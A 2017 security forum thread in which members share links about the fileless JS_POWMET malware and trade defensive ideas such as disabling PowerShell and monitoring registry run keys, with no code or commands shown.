JS_POWMET malware is 100% fileless, from infection to payload

Discussion in 'malware problems & news' started by itman, Aug 2, 2017.

  1. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    6,115
    Location:
    U.S.A.
    https://www.scmagazine.com/search/Trend Micro/
     
  2. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    6,115
    Location:
    U.S.A.
    Does the regsrv32 command line options look familiar folks?
    http://blog.trendmicro.com/trendlab...e/look-js_powmet-completely-fileless-malware/
     
  3. Sordid

    Sordid Registered Member

    Joined:
    Oct 25, 2011
    Posts:
    231
  4. NormanF

    NormanF Registered Member

    Joined:
    Feb 20, 2009
    Posts:
    2,354
    Culprit is Powershell. Disable it or remove it to mitigate fileless malware attacks.
     
  5. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    4,292
    Location:
    Europe then Asia
    there is several techniques to load powershell scripts without powershell.exe.
    This malware could be modified to do it.
     
  6. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    6,115
    Location:
    U.S.A.
    You stop malware like this by using a security solution that monitors what is written to registry run and run once keys. Anything after that point is a losing effort.
     
  7. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    6,912
    Location:
    U.S.A. (South)
Loading...